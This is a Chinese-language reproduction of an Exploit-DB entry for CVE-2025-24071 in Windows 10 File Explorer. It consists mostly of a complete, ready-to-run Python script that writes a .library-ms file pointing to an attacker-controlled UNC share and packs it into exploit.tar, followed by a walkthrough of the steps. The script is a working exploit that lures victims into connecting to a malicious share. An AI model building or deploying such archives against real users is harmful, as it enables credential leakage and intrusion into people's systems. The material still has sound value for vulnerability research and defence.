本文详细介绍了Windows 10 Pro x64文件管理器在处理TAR文件时的远程漏洞利用方法,包含完整的Python代码实现和漏洞利用过程,涉及网络共享路径构造和文件操作技术。
漏洞信息
- EDB-ID: 52325
- CVE: 2025-24071
- 类型: 远程漏洞
- 平台: Windows
- 日期: 2025-06-13
- 作者: Daniel Miranda
- 验证状态: EDB已验证
漏洞利用代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
import os
import tarfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\IT</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
tar_name = "exploit.tar"
with tarfile.open(tar_name, "w") as tarf:
tarf.add(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()
|
技术说明
该漏洞利用涉及以下技术要点:
- 库文件构造: 创建恶意的
.library-ms
文件,其中包含指向远程共享位置的XML配置
- 网络路径注入: 通过
\\\\{ip_address}\\IT
格式构造UNC路径,指向攻击者控制的共享资源
- TAR文件打包: 使用Python的tarfile模块将恶意库文件打包成TAR归档
- 文件清理: 利用完成后自动删除临时生成的库文件
利用流程
- 用户输入文件名和目标IP地址
- 生成包含恶意网络路径的库配置文件
- 将配置文件打包为TAR文件
- 清理临时文件并完成利用准备
该漏洞允许攻击者通过特制的TAR文件诱导用户连接到恶意网络共享,从而实现远程攻击。